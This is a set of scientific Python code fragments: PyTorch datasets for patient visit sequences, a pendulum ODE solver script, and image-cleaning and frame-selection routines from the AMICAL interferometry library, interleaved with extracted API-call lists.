age_squared = age ** 2
age_sqrt = torch.sqrt(age)
ages = torch.stack([age, age_squared, age_sqrt]).T
scaler = StandardScaler()
scaler.fit(ages[train_indices])
        # StandardScaler returns a numpy array; convert back to a tensor so
        # torch.cat below does not fail
        ages = torch.as_tensor(scaler.transform(ages), dtype=torch.float32)
# other covariates
other_df = non_temporal[non_temporal.covariateId != age_id].sort_values(by='rowIdPython')
not_age = torch.zeros((len(ages)))
not_age[other_df.rowIdPython.values] = torch.as_tensor(other_df.covariateValue.values, dtype=torch.float32)
self.num = torch.cat([ages, not_age[:, None]], dim=1)
def __len__(self):
return len(self.indices)
def __getitem__(self, item):
if self.distill:
return (self.indices[item], self.num[item]), (
self.outcomes[self.indices[item]], self.linear_predictions[self.indices[item]])
else:
return (self.indices[item], self.num[item]), self.outcomes[self.indices[item]]
class VisitSequenceWithLabelDataset(Dataset):
"""
Dataset class that uses lists of lists
"""
def __init__(self, seqs, labels, num_features, non_temporal_data, visits, train_indices, reverse=False):
"""
Args:
seqs (list): list of patients (list) of visits (list) of codes (int) that contains visit sequences
labels (list): list of labels (int)
num_features (int): number of total features available
non_temporal_data (dataframe): dataframe with nonTemporalData such as age or gender.
visits (list): list of patients with timeId of visits
train_indices (): indices of training set, used for operations that should only use info from training set
reverse (bool): If true, reverse the order of sequence (for RETAIN)
"""
if len(seqs) != len(labels):
raise ValueError("Sequences and Labels have different lengths")
        # convert R's 1-based row ids to Python's 0-based indexing
non_temporal_data.rowIdPython = non_temporal_data.rowIdPython - 1
# extract age and other covariates
age_id = 1002
age_df = non_temporal_data[non_temporal_data.covariateId == age_id]
age_df = age_df.sort_values(by='rowIdPython')
age = torch.as_tensor(age_df.covariateValue.values, dtype=torch.float32)
age_squared = age ** 2
age_sqrt = torch.sqrt(age)
ages = torch.stack([age, age_squared, age_sqrt]).T
scaler = StandardScaler()
scaler.fit(ages[train_indices])
ages = torch.as_tensor(scaler.transform(ages), dtype=torch.float32)
# other covariates
other_df = non_temporal_data[non_temporal_data.covariateId != age_id].sort_values(by='rowIdPython')
not_age = torch.zeros((len(seqs)))
not_age[other_df.rowIdPython.values] = torch.as_tensor(other_df.covariateValue.values, dtype=torch.float32)
self.train_indices = train_indices
self.num = torch.cat([ages, not_age[:, None]], dim=1)
n_visits = [len(v) for v in visits]
self.max_visits = np.percentile(n_visits, 99).astype(int)
self.num_features = num_features
self.visits = torch.vstack(
[F.pad(torch.as_tensor(v, dtype=torch.long), (0, self.max_visits - len(v))) for v in visits])
self.seqs = []
self.lengths = []
for i, (seq, label) in tqdm(enumerate(zip(seqs, labels))):
if reverse:
sequence = list(reversed(seq))
else:
sequence = seq
row = []
col = []
val = []
for j, visit in enumerate(sequence):
for code in visit:
if code < num_features:
row.append(j)
col.append(code)
val.append(1.0)
if len(sequence) < self.max_visits:
self.seqs.append(coo_matrix((np.array(val, dtype=np.float32), (np.array(row), np.array(col))),
shape=(self.max_visits, num_features)))
self.lengths.append(len(sequence))
else:
ix = np.array(row) < self.max_visits # truncate to max visits
self.seqs.append(
coo_matrix((np.array(val, dtype=np.float32)[ix], (np.array(row)[ix], np.array(col)[ix])),
shape=(self.max_visits, num_features)))
self.lengths.append(self.max_visits)
self.labels = torch.as_tensor(labels, dtype=torch.float32)
def __len__(self):
return len(self.labels)
def __getitem__(self, index):
return torch.as_tensor(self.seqs[index].todense()), self.num[index, ...], self.labels[index], \
self.lengths[index], self.visits[index]
class DistillDataset(VisitSequenceWithLabelDataset):
"""
Dataset class for the distillation where I needed to add the predictions from the teacher model
"""
def __init__(self, linear_predictions=None, distill=True, **kwargs):
super(DistillDataset, self).__init__(**kwargs)
self.distill = distill
self.linear_predictions = torch.as_tensor(linear_predictions.values, dtype=torch.float32)
def __len__(self):
return len(self.labels)
def __getitem__(self, index):
if self.distill:
return torch.as_tensor(self.seqs[index].todense()), self.num[index, ...], self.linear_predictions[index], \
self.labels[index], \
self.lengths[index], self.visits[index]
else:
return torch.as_tensor(self.seqs[index].todense()), self.num[index, ...], self.labels[index], \
self.lengths[index], self.visits[index]
class RETAIN_dataset(Dataset):
"""
    RETAIN is an RNN and can work with variable-length sequences, so this
    class does not pad the input.
"""
def __init__(self, seqs, labels, num_features, non_temporal_data, visits, train_indices, reverse=True):
"""
Args:
seqs (list): list of patients (list) of visits (list) of codes (int) that contains visit sequences
labels (list): list of labels (int)
num_features (int): number of total features available
non_temporal_data (dataframe): dataframe with nonTemporalData such as age or gender.
visits (list): list of patients with timeId of visits
train_indices (): indices of training set, used for operations that should only use info from training set
reverse (bool): If true, reverse the order of sequence (for RETAIN)
"""
if len(seqs) != len(labels):
raise ValueError("Sequences and Labels have different lengths")
        # convert R's 1-based row ids to Python's 0-based indexing
non_temporal_data.rowIdPython = non_temporal_data.rowIdPython - 1
# extract age and other covariates
age_id = 1002
age_df = non_temporal_data[non_temporal_data.covariateId == age_id]
age_df = age_df.sort_values(by='rowIdPython')
age = torch.as_tensor(age_df.covariateValue.values, dtype=torch.float32)
age_squared = age ** 2
age_sqrt = torch.sqrt(age)
ages = torch.stack([age, age_squared, age_sqrt]).T
age_maxes = torch.max(ages[train_indices], dim=0).values
ages = ages / age_maxes
# other covariates
other_df = non_temporal_data[non_temporal_data.covariateId != age_id].sort_values(by='rowIdPython')
not_age = torch.zeros((len(seqs)))
not_age[other_df.rowIdPython.values] = torch.as_tensor(other_df.covariateValue.values, dtype=torch.float32)
self.num = torch.cat([ages, not_age[:, None]], dim=1)
self.visits = visits
self.seqs = []
self.lengths = []
for i, (seq, label) in enumerate(zip(seqs, labels)):
if reverse:
sequence = list(reversed(seq))
else:
sequence = seq
row = []
col = []
val = []
for j, visit in enumerate(sequence):
for code in visit:
if code < num_features:
row.append(j)
col.append(code)
val.append(1.0)
self.seqs.append(coo_matrix((np.array(val, dtype=np.float32), (np.array(row), np.array(col))),
shape=(len(sequence), num_features)))
self.lengths.append(len(sequence))
self.labels = torch.as_tensor(labels, dtype=torch.long)
def __len__(self):
return len(self.labels)
def __getitem__(self, index):
return torch.as_tensor(self.seqs[index].todense()), self.num[index, ...], self.labels[index], \
self.lengths[index], self.visits[index]
def pad(batch):
"""
Collate function that I use with RETAIN and the vanilla Transformer.
Parameters
----------
    batch : list of (sequence, numeric covariates, label, length, visits) samples.
    Returns
    -------
    A list with the model inputs and a tensor with the targets.
    """
batch_split = list(zip(*batch))
seqs, num, targs, lengths, visits = batch_split[0], batch_split[1], batch_split[2], batch_split[3], batch_split[4]
num = torch.vstack([torch.as_tensor(sample, dtype=torch.float32) for sample in zip(*num)]).T
visits = [torch.as_tensor(s, dtype=torch.long) for s in visits]
return [list(seqs), num, torch.as_tensor(lengths, dtype=torch.long), visits], \
torch.as_tensor(targs, dtype=torch.float32)
def distill_pad(batch):
"""
Collate function I use when distilling
Parameters
----------
    batch : list of (sequence, numeric covariates, teacher prediction, label, length, visits) samples.
    Returns
    -------
    A list with the model inputs and a list with the target and teacher-prediction tensors.
    """
batch_split = list(zip(*batch))
seqs, num, preds, targs, lengths, visits = batch_split[0], batch_split[1], batch_split[2], batch_split[3], \
batch_split[4], batch_split[5]
num = torch.vstack([torch.as_tensor(sample, dtype=torch.float32) for sample in zip(*num)]).T
visits = [torch.as_tensor(s, dtype=torch.long) for s in visits]
return [list(seqs), num, torch.as_tensor(lengths, dtype=torch.long), visits], \
[torch.as_tensor(targs, dtype=torch.float32), torch.as_tensor(preds, dtype=torch.float32)]
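# Illustrative sketch (an assumption, not original code): `pad` and `distill_pad`
# are meant to be passed as collate functions for the sequence datasets above.
def _example_sequence_loader(dataset, distill=False, batch_size=64):
    from torch.utils.data import DataLoader
    collate = distill_pad if distill else pad
    return DataLoader(dataset, batch_size=batch_size, shuffle=True, collate_fn=collate)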
|
[
"numpy.clip",
"torch.as_tensor",
"torch.load",
"torch.stack",
"torch.sqrt",
"torch.max",
"sklearn.preprocessing.StandardScaler",
"numpy.array",
"torch_geometric.data.Batch.from_data_list",
"torch.save",
"tqdm.auto.tqdm",
"numpy.percentile",
"utils.data_utils.add_age_gender",
"torch.cat"
] |
[((622, 657), 'torch.load', 'torch.load', (['self.processed_paths[0]'], {}), '(self.processed_paths[0])\n', (632, 657), False, 'import torch\n'), ((1016, 1045), 'torch.load', 'torch.load', (['self.raw_paths[0]'], {}), '(self.raw_paths[0])\n', (1026, 1045), False, 'import torch\n'), ((1611, 1652), 'numpy.clip', 'np.clip', (['feature_matrix_counts.data', '(0)', '(1)'], {}), '(feature_matrix_counts.data, 0, 1)\n', (1618, 1652), True, 'import numpy as np\n'), ((1729, 1841), 'utils.data_utils.add_age_gender', 'add_age_gender', (['feature_matrix_counts', "data['nonTemporalData']", 'windowed_feature_names'], {'age_normalized': '(False)'}), "(feature_matrix_counts, data['nonTemporalData'],\n windowed_feature_names, age_normalized=False)\n", (1743, 1841), False, 'from utils.data_utils import window_data_sorted, add_age_gender\n'), ((2368, 2384), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (2382, 2384), False, 'from sklearn.preprocessing import StandardScaler\n'), ((2602, 2678), 'torch.as_tensor', 'torch.as_tensor', (["data['population'].outcomeCount.values"], {'dtype': 'torch.float32'}), "(data['population'].outcomeCount.values, dtype=torch.float32)\n", (2617, 2678), False, 'import torch\n'), ((2706, 2760), 'torch.as_tensor', 'torch.as_tensor', (['demographic_data'], {'dtype': 'torch.float32'}), '(demographic_data, dtype=torch.float32)\n', (2721, 2760), False, 'import torch\n'), ((2976, 3027), 'torch.save', 'torch.save', (['(data, slices)', 'self.processed_paths[0]'], {}), '((data, slices), self.processed_paths[0])\n', (2986, 3027), False, 'import torch\n'), ((3190, 3208), 'tqdm.auto.tqdm', 'tqdm', (['patient_idxs'], {}), '(patient_idxs)\n', (3194, 3208), False, 'from tqdm.auto import tqdm\n'), ((5087, 5114), 'torch_geometric.data.Batch.from_data_list', 'Batch.from_data_list', (['batch'], {}), '(batch)\n', (5107, 5114), False, 'from torch_geometric.data import InMemoryDataset, Data, Batch\n'), ((6232, 6298), 'torch.as_tensor', 'torch.as_tensor', (['age_df.covariateValue.values'], {'dtype': 'torch.float32'}), '(age_df.covariateValue.values, dtype=torch.float32)\n', (6247, 6298), False, 'import torch\n'), ((6349, 6364), 'torch.sqrt', 'torch.sqrt', (['age'], {}), '(age)\n', (6359, 6364), False, 'import torch\n'), ((6441, 6457), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (6455, 6457), False, 'from sklearn.preprocessing import StandardScaler\n'), ((6752, 6820), 'torch.as_tensor', 'torch.as_tensor', (['other_df.covariateValue.values'], {'dtype': 'torch.float32'}), '(other_df.covariateValue.values, dtype=torch.float32)\n', (6767, 6820), False, 'import torch\n'), ((6841, 6883), 'torch.cat', 'torch.cat', (['[ages, not_age[:, None]]'], {'dim': '(1)'}), '([ages, not_age[:, None]], dim=1)\n', (6850, 6883), False, 'import torch\n'), ((8497, 8563), 'torch.as_tensor', 'torch.as_tensor', (['age_df.covariateValue.values'], {'dtype': 'torch.float32'}), '(age_df.covariateValue.values, dtype=torch.float32)\n', (8512, 8563), False, 'import torch\n'), ((8614, 8629), 'torch.sqrt', 'torch.sqrt', (['age'], {}), '(age)\n', (8624, 8629), False, 'import torch\n'), ((8706, 8722), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (8720, 8722), False, 'from sklearn.preprocessing import StandardScaler\n'), ((9065, 9133), 'torch.as_tensor', 'torch.as_tensor', (['other_df.covariateValue.values'], {'dtype': 'torch.float32'}), '(other_df.covariateValue.values, dtype=torch.float32)\n', (9080, 9133), False, 'import torch\n'), ((9197, 9239), 
'torch.cat', 'torch.cat', (['[ages, not_age[:, None]]'], {'dim': '(1)'}), '([ages, not_age[:, None]], dim=1)\n', (9206, 9239), False, 'import torch\n'), ((10765, 10809), 'torch.as_tensor', 'torch.as_tensor', (['labels'], {'dtype': 'torch.float32'}), '(labels, dtype=torch.float32)\n', (10780, 10809), False, 'import torch\n'), ((11426, 11489), 'torch.as_tensor', 'torch.as_tensor', (['linear_predictions.values'], {'dtype': 'torch.float32'}), '(linear_predictions.values, dtype=torch.float32)\n', (11441, 11489), False, 'import torch\n'), ((13340, 13406), 'torch.as_tensor', 'torch.as_tensor', (['age_df.covariateValue.values'], {'dtype': 'torch.float32'}), '(age_df.covariateValue.values, dtype=torch.float32)\n', (13355, 13406), False, 'import torch\n'), ((13457, 13472), 'torch.sqrt', 'torch.sqrt', (['age'], {}), '(age)\n', (13467, 13472), False, 'import torch\n'), ((13855, 13923), 'torch.as_tensor', 'torch.as_tensor', (['other_df.covariateValue.values'], {'dtype': 'torch.float32'}), '(other_df.covariateValue.values, dtype=torch.float32)\n', (13870, 13923), False, 'import torch\n'), ((13944, 13986), 'torch.cat', 'torch.cat', (['[ages, not_age[:, None]]'], {'dim': '(1)'}), '([ages, not_age[:, None]], dim=1)\n', (13953, 13986), False, 'import torch\n'), ((14814, 14855), 'torch.as_tensor', 'torch.as_tensor', (['labels'], {'dtype': 'torch.long'}), '(labels, dtype=torch.long)\n', (14829, 14855), False, 'import torch\n'), ((15548, 15584), 'torch.as_tensor', 'torch.as_tensor', (['s'], {'dtype': 'torch.long'}), '(s, dtype=torch.long)\n', (15563, 15584), False, 'import torch\n'), ((15697, 15740), 'torch.as_tensor', 'torch.as_tensor', (['targs'], {'dtype': 'torch.float32'}), '(targs, dtype=torch.float32)\n', (15712, 15740), False, 'import torch\n'), ((16233, 16269), 'torch.as_tensor', 'torch.as_tensor', (['s'], {'dtype': 'torch.long'}), '(s, dtype=torch.long)\n', (16248, 16269), False, 'import torch\n'), ((6380, 6421), 'torch.stack', 'torch.stack', (['[age, age_squared, age_sqrt]'], {}), '([age, age_squared, age_sqrt])\n', (6391, 6421), False, 'import torch\n'), ((8645, 8686), 'torch.stack', 'torch.stack', (['[age, age_squared, age_sqrt]'], {}), '([age, age_squared, age_sqrt])\n', (8656, 8686), False, 'import torch\n'), ((13488, 13529), 'torch.stack', 'torch.stack', (['[age, age_squared, age_sqrt]'], {}), '([age, age_squared, age_sqrt])\n', (13499, 13529), False, 'import torch\n'), ((13552, 13589), 'torch.max', 'torch.max', (['ages[train_indices]'], {'dim': '(0)'}), '(ages[train_indices], dim=0)\n', (13561, 13589), False, 'import torch\n'), ((15631, 15673), 'torch.as_tensor', 'torch.as_tensor', (['lengths'], {'dtype': 'torch.long'}), '(lengths, dtype=torch.long)\n', (15646, 15673), False, 'import torch\n'), ((16316, 16358), 'torch.as_tensor', 'torch.as_tensor', (['lengths'], {'dtype': 'torch.long'}), '(lengths, dtype=torch.long)\n', (16331, 16358), False, 'import torch\n'), ((16383, 16426), 'torch.as_tensor', 'torch.as_tensor', (['targs'], {'dtype': 'torch.float32'}), '(targs, dtype=torch.float32)\n', (16398, 16426), False, 'import torch\n'), ((16428, 16471), 'torch.as_tensor', 'torch.as_tensor', (['preds'], {'dtype': 'torch.float32'}), '(preds, dtype=torch.float32)\n', (16443, 16471), False, 'import torch\n'), ((9310, 9337), 'numpy.percentile', 'np.percentile', (['n_visits', '(99)'], {}), '(n_visits, 99)\n', (9323, 9337), True, 'import numpy as np\n'), ((15461, 15505), 'torch.as_tensor', 'torch.as_tensor', (['sample'], {'dtype': 'torch.float32'}), '(sample, dtype=torch.float32)\n', (15476, 15505), False, 
'import torch\n'), ((16146, 16190), 'torch.as_tensor', 'torch.as_tensor', (['sample'], {'dtype': 'torch.float32'}), '(sample, dtype=torch.float32)\n', (16161, 16190), False, 'import torch\n'), ((3924, 3964), 'torch.as_tensor', 'torch.as_tensor', (['[patient_data.shape[1]]'], {}), '([patient_data.shape[1]])\n', (3939, 3964), False, 'import torch\n'), ((9446, 9482), 'torch.as_tensor', 'torch.as_tensor', (['v'], {'dtype': 'torch.long'}), '(v, dtype=torch.long)\n', (9461, 9482), False, 'import torch\n'), ((10416, 10429), 'numpy.array', 'np.array', (['row'], {}), '(row)\n', (10424, 10429), True, 'import numpy as np\n'), ((14601, 14632), 'numpy.array', 'np.array', (['val'], {'dtype': 'np.float32'}), '(val, dtype=np.float32)\n', (14609, 14632), True, 'import numpy as np\n'), ((10176, 10207), 'numpy.array', 'np.array', (['val'], {'dtype': 'np.float32'}), '(val, dtype=np.float32)\n', (10184, 10207), True, 'import numpy as np\n'), ((14635, 14648), 'numpy.array', 'np.array', (['row'], {}), '(row)\n', (14643, 14648), True, 'import numpy as np\n'), ((14650, 14663), 'numpy.array', 'np.array', (['col'], {}), '(col)\n', (14658, 14663), True, 'import numpy as np\n'), ((10210, 10223), 'numpy.array', 'np.array', (['row'], {}), '(row)\n', (10218, 10223), True, 'import numpy as np\n'), ((10225, 10238), 'numpy.array', 'np.array', (['col'], {}), '(col)\n', (10233, 10238), True, 'import numpy as np\n'), ((10540, 10571), 'numpy.array', 'np.array', (['val'], {'dtype': 'np.float32'}), '(val, dtype=np.float32)\n', (10548, 10571), True, 'import numpy as np\n'), ((10578, 10591), 'numpy.array', 'np.array', (['row'], {}), '(row)\n', (10586, 10591), True, 'import numpy as np\n'), ((10597, 10610), 'numpy.array', 'np.array', (['col'], {}), '(col)\n', (10605, 10610), True, 'import numpy as np\n')]
|
#! /usr/bin/env python
# -*- coding: utf8 -*-
import numpy as np
import matplotlib.pyplot as plt
from scipy.integrate import odeint # uses LSODA from ODEPACK
def pend(y, t, b, c): # function definition
"""Gives 2D vector dy/dt as function of y and t, with parameters b and c."""
return np.array([y[1], -b*y[1] - c*np.sin(y[0])])
b, c = 0.25, 5.0 # tuple assignment
y0 = np.array([np.pi - 0.1, 0.0])
t = np.linspace(0, 10, 101) # on [0,10] with 101 points
sol = odeint(pend, y0, t, args=(b, c))
plt.plot(t, sol[:, 0], 'b', label=r'$\theta(t)$') # blue
plt.plot(t, sol[:, 1], 'g', label=r'$\omega(t)$') # green
plt.legend(loc='best')
plt.xlabel('t')
plt.grid()
plt.savefig("figures/Pendulum_solution.png")
plt.show()
|
[
"matplotlib.pyplot.grid",
"matplotlib.pyplot.savefig",
"scipy.integrate.odeint",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"numpy.array",
"numpy.linspace",
"numpy.sin",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.show"
] |
[((380, 408), 'numpy.array', 'np.array', (['[np.pi - 0.1, 0.0]'], {}), '([np.pi - 0.1, 0.0])\n', (388, 408), True, 'import numpy as np\n'), ((413, 436), 'numpy.linspace', 'np.linspace', (['(0)', '(10)', '(101)'], {}), '(0, 10, 101)\n', (424, 436), True, 'import numpy as np\n'), ((473, 505), 'scipy.integrate.odeint', 'odeint', (['pend', 'y0', 't'], {'args': '(b, c)'}), '(pend, y0, t, args=(b, c))\n', (479, 505), False, 'from scipy.integrate import odeint\n'), ((507, 556), 'matplotlib.pyplot.plot', 'plt.plot', (['t', 'sol[:, 0]', '"""b"""'], {'label': '"""$\\\\theta(t)$"""'}), "(t, sol[:, 0], 'b', label='$\\\\theta(t)$')\n", (515, 556), True, 'import matplotlib.pyplot as plt\n'), ((565, 614), 'matplotlib.pyplot.plot', 'plt.plot', (['t', 'sol[:, 1]', '"""g"""'], {'label': '"""$\\\\omega(t)$"""'}), "(t, sol[:, 1], 'g', label='$\\\\omega(t)$')\n", (573, 614), True, 'import matplotlib.pyplot as plt\n'), ((624, 646), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""'}), "(loc='best')\n", (634, 646), True, 'import matplotlib.pyplot as plt\n'), ((647, 662), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""t"""'], {}), "('t')\n", (657, 662), True, 'import matplotlib.pyplot as plt\n'), ((663, 673), 'matplotlib.pyplot.grid', 'plt.grid', ([], {}), '()\n', (671, 673), True, 'import matplotlib.pyplot as plt\n'), ((674, 718), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""figures/Pendulum_solution.png"""'], {}), "('figures/Pendulum_solution.png')\n", (685, 718), True, 'import matplotlib.pyplot as plt\n'), ((719, 729), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (727, 729), True, 'import matplotlib.pyplot as plt\n'), ((321, 333), 'numpy.sin', 'np.sin', (['y[0]'], {}), '(y[0])\n', (327, 333), True, 'import numpy as np\n')]
|
"""
@author: <NAME> (University of Sydney)
-------------------------------------------------------------------------
AMICAL: Aperture Masking Interferometry Calibration and Analysis Library
-------------------------------------------------------------------------
Functions related to data cleaning (ghost, background correction,
centering, etc.) and data selection (sigma-clipping, centered flux, etc.).
--------------------------------------------------------------------
"""
import numpy as np
from astropy.convolution import Gaussian2DKernel, interpolate_replace_nans
from astropy.io import fits
from matplotlib import pyplot as plt
from matplotlib.colors import PowerNorm
from termcolor import cprint
from tqdm import tqdm
from amical.tools import apply_windowing, crop_max
def _apply_patch_ghost(cube, xc, yc, radius=20, dx=0, dy=-200, method='bg'):
"""Apply a patch on an eventual artifacts/ghosts on the spectral filter (i.e.
K1 filter of SPHERE presents an artifact/ghost at (392, 360)).
Arguments:
----------
`cube` {array} -- Data cube,\n
`xc` {int} -- x-axis position of the artifact,\n
`yc` {int} -- y-axis position of the artifact.
Keyword Arguments:
----------
`radius` {int} -- Radius to apply the patch in a circle (default: {10}),\n
`dy` {int} -- Offset pixel number to compute background values (default: {0}),\n
`dx` {int} -- Same along y-axis (default: {0}),\n
`method` {str} -- If 'bg', the replacement values are the background computed at
xc+dx, yx+dy, else zero is apply (default: {'bg'}).
"""
cube_corrected = []
for i in range(len(cube)):
imA = cube[i].copy()
isz = imA.shape[0]
xc_off, yc_off = xc+dx, yc+dy
xx, yy = np.arange(isz), np.arange(isz)
xx_c = (xx-xc)
yy_c = (yc-yy)
xx_off = (xx-xc_off)
yy_off = (yc_off-yy)
distance = np.sqrt(xx_c**2 + yy_c[:, np.newaxis]**2)
distance_off = np.sqrt(xx_off**2 + yy_off[:, np.newaxis]**2)
cond_patch = (distance <= radius)
cond_bg = (distance_off <= radius)
if method == 'bg':
imA[cond_patch] = imA[cond_bg]
elif method == 'zero':
imA[cond_patch] = 0
cube_corrected.append(imA)
cube_corrected = np.array(cube_corrected)
return cube_corrected
def select_data(cube, clip_fact=0.5, clip=False, verbose=True, display=True):
""" Check the cleaned data cube using the position of the maximum in the
    fft image (supposed to be zero). If the maximum is not at the zero
    position, the frame is rejected. It can apply sigma-clipping to select
    only the frames with the highest total fluxes.
Parameters:
-----------
`cube` {array} -- Data cube,\n
`clip_fact` {float} -- Relative sigma if rejecting frames by
    sigma-clipping (default=0.5),\n
`clip` {bool} -- If True, sigma-clipping is used,\n
    `verbose` {bool} -- If True, print information in the terminal,\n
`display` {bool} -- If True, plot figures.
"""
fft_fram = abs(np.fft.fft2(cube))
# flag_fram, cube_flagged, cube_cleaned_checked = [], [], []
fluxes, flag_fram, good_fram = [], [], []
for i in range(len(fft_fram)):
fluxes.append(fft_fram[i][0, 0])
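        # fft_fram[i][0, 0] is the integrated flux (DC term); for a well-centred
        # frame the FFT maximum sits at that zero position, otherwise the frame
        # is flagged as bad.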
pos_max = np.argmax(fft_fram[i])
if pos_max != 0:
flag_fram.append(i)
else:
good_fram.append(cube[i])
fluxes = np.array(fluxes)
flag_fram = np.array(flag_fram)
best_fr = np.argmax(fluxes)
worst_fr = np.argmin(fluxes)
std_flux = np.std(fluxes)
med_flux = np.median(fluxes)
if verbose:
if (med_flux/std_flux) <= 5.:
cprint('\nStd of the fluxes along the cube < 5 (%2.1f):\n -> sigma clipping is suggested (clip=True).' % (
(med_flux/std_flux)), 'cyan')
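    # Frames whose integrated flux falls below median - clip_fact * std are
    # rejected when sigma-clipping is enabled.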
limit_flux = med_flux - clip_fact*std_flux
if clip:
cond_clip = (fluxes > limit_flux)
cube_cleaned_checked = cube[cond_clip]
ind_clip = np.where(fluxes <= limit_flux)[0]
else:
ind_clip = []
cube_cleaned_checked = np.array(good_fram)
ind_clip2 = np.where(fluxes <= limit_flux)[0]
if ((worst_fr in ind_clip2) and clip) or (worst_fr in flag_fram):
ext = '(rejected)'
else:
ext = ''
diffmm = 100*abs(np.max(fluxes) - np.min(fluxes))/med_flux
if display:
plt.figure()
plt.plot(fluxes, label=r'|$\Delta F$|/$\sigma_F$=%2.0f (%2.2f %%)' %
(med_flux/std_flux, diffmm))
if len(flag_fram) > 0:
plt.scatter(flag_fram, fluxes[flag_fram],
s=52, facecolors='none', edgecolors='r', label='Rejected frames (maximum fluxes)')
if clip:
if len(ind_clip) > 0:
plt.plot(ind_clip, fluxes[ind_clip], 'rx',
label='Rejected frames (clipping)')
else:
print('0')
plt.hlines(limit_flux, 0, len(fluxes), lw=1,
ls='--', label='Clipping limit', zorder=10)
plt.legend(loc='best', fontsize=9)
plt.ylabel('Flux [counts]')
plt.xlabel('# frames')
plt.grid(alpha=.2)
plt.tight_layout()
plt.figure(figsize=(7, 7))
plt.subplot(2, 2, 1)
        plt.title('Best frame (%i)' % best_fr)
plt.imshow(cube[best_fr], norm=PowerNorm(.5), cmap='afmhot', vmin=0)
plt.subplot(2, 2, 2)
plt.imshow(np.fft.fftshift(fft_fram[best_fr]), cmap='gist_stern')
plt.subplot(2, 2, 3)
        plt.title('Worst frame (%i) %s' % (worst_fr, ext))
plt.imshow(cube[worst_fr], norm=PowerNorm(.5), cmap='afmhot', vmin=0)
plt.subplot(2, 2, 4)
plt.imshow(np.fft.fftshift(fft_fram[worst_fr]), cmap='gist_stern')
plt.tight_layout()
plt.show(block=False)
if verbose:
n_good = len(cube_cleaned_checked)
n_bad = len(cube) - n_good
if clip:
cprint('\n---- σ-clip + centered fluxes selection ---', 'cyan')
else:
cprint('\n---- centered fluxes selection ---', 'cyan')
print('%i/%i (%2.1f%%) are flagged as bad frames' %
(n_bad, len(cube), 100*float(n_bad)/len(cube)))
return cube_cleaned_checked
def sky_correction(imA, r1=100, dr=20, verbose=False):
"""
Perform background sky correction to be as close to zero as possible.
"""
isz = imA.shape[0]
xc, yc = isz//2, isz//2
xx, yy = np.arange(isz), np.arange(isz)
xx2 = (xx-xc)
yy2 = (yc-yy)
r2 = r1 + dr
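    # The sky background is estimated in an annulus of radii [r1, r1 + dr]
    # centred on the image centre.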
distance = np.sqrt(xx2**2 + yy2[:, np.newaxis]**2)
cond_bg = (r1 <= distance) & (distance <= r2)
try:
minA = imA.min()
imB = imA + 1.01*abs(minA)
backgroundB = np.mean(imB[cond_bg])
imC = imB - backgroundB
backgroundC = np.mean(imC[cond_bg])
except IndexError:
imC = imA.copy()
backgroundC = 0
if verbose:
cprint('Warning: Background not computed', 'green')
cprint(
'-> check the inner and outer radius rings (checkrad option).', 'green')
return imC, backgroundC
def fix_bad_pixels(image, bad_map, add_bad=[], x_stddev=1):
""" Replace bad pixels with values interpolated from their neighbors (interpolation
is made with a gaussian kernel convolution)."""
if len(add_bad) != 0:
for j in range(len(add_bad)):
bad_map[add_bad[j][0], add_bad[j][1]] = 1
img_nan = image.copy()
img_nan[bad_map == 1] = np.nan
kernel = Gaussian2DKernel(x_stddev=x_stddev)
fixed_image = interpolate_replace_nans(img_nan, kernel)
return fixed_image
def check_data_params(filename, isz, r1, dr, bad_map=None, add_bad=[],
edge=0, remove_bad=True, nframe=0, ihdu=0, f_kernel=3,
offx=0, offy=0, apod=False, window=None):
""" Check the input parameters for the cleaning.
Parameters:
-----------
`filename` {str}: filename containing the datacube,\n
`isz` {int}: Size of the cropped image (default: 256)\n
`r1` {int}: Radius of the rings to compute background sky (default: 100)\n
`dr` {int}: Outer radius to compute sky (default: 10)\n
`bad_map` {array}: Bad pixel map with 0 and 1 where 1 set for a bad pixel (default: None),\n
`add_bad` {list}: List of 2d coordinates of bad pixels/cosmic rays (default: []),\n
`edge` {int}: Number of pixel to be removed on the edge of the image (SPHERE),\n
`remove_bad` {bool}: If True, the bad pixels are removed using a gaussian interpolation,\n
`nframe` {int}: Frame number to be shown (default: 0),\n
`ihdu` {int}: Hdu number of the fits file. Normally 1 for NIRISS and 0 for SPHERE (default: 0).
"""
data = fits.open(filename)[ihdu].data
img0 = data[nframe]
if edge != 0:
img0[:, 0:edge] = 0
img0[:, -edge:-1] = 0
img0[0:edge, :] = 0
img0[-edge:-1, :] = 0
if (bad_map is not None) & (remove_bad):
img1 = fix_bad_pixels(img0, bad_map, add_bad=add_bad)
else:
img1 = img0.copy()
cropped_infos = crop_max(img1, isz, offx=offx, offy=offy, f=f_kernel)
pos = cropped_infos[1]
noBadPixel = False
bad_pix_x, bad_pix_y = [], []
if (bad_map is not None) or (len(add_bad) != 0):
for j in range(len(add_bad)):
bad_map[add_bad[j][0], add_bad[j][1]] = 1
bad_pix = np.where(bad_map == 1)
bad_pix_x = bad_pix[0]
bad_pix_y = bad_pix[1]
else:
noBadPixel = True
r2 = r1 + dr
theta = np.linspace(0, 2*np.pi, 100)
x0 = pos[0]
y0 = pos[1]
x1 = r1 * np.cos(theta) + x0
y1 = r1 * np.sin(theta) + y0
x2 = r2 * np.cos(theta) + x0
y2 = r2 * np.sin(theta) + y0
if window is not None:
r3 = window
x3 = r3 * np.cos(theta) + x0
y3 = r3 * np.sin(theta) + y0
xs1, ys1 = x0 + isz//2, y0 + isz//2
xs2, ys2 = x0 - isz//2, y0 + isz//2
xs3, ys3 = x0 - isz//2, y0 - isz//2
xs4, ys4 = x0 + isz//2, y0 - isz//2
max_val = img1[y0, x0]
fig = plt.figure(figsize=(6, 6))
plt.imshow(img1, norm=PowerNorm(.5), cmap='afmhot', vmin=0, vmax=max_val)
plt.plot(x1, y1, label='Inner radius for sky subtraction')
plt.plot(x2, y2, label='Outer radius for sky subtraction')
if apod:
if window is not None:
plt.plot(x3, y3, label='Super-gaussian windowing')
plt.plot(x0, y0, '+', color='g', ms=10, label='Centering position')
